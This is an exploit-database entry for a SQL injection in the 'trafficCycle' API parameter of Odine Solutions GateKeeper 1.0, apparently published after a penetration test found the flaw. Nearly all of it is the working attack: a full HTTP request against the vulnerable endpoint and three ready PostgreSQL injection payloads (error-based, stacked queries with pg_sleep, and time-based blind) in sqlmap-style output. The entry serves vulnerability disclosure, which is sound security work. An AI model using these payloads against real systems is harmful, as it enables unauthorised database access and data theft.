Odine Solutions GateKeeper 1.0 Exploit, 'trafficCycle' SQL Injection

# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Date: 05.10.2021
# Exploit Author: Emel Basayar
# Vendor: Odine Solutions - odinesolutions.com
# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18 TLS
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.
# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.
====================================================

# PoC : SQLi :

GET /rass/api/v1/trafficCycle/98 HTTP/1.1
Host: 192.168.1.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
Origin: https://192.168.1.25
Connection: close
Referer: https://192.168.1.25

Parameter: #1* (URI)
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
---
web application technology: Nginx
back-end DBMS: PostgreSQL

====================================================

All rights reserved nPulse.net 2009 - 2021
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD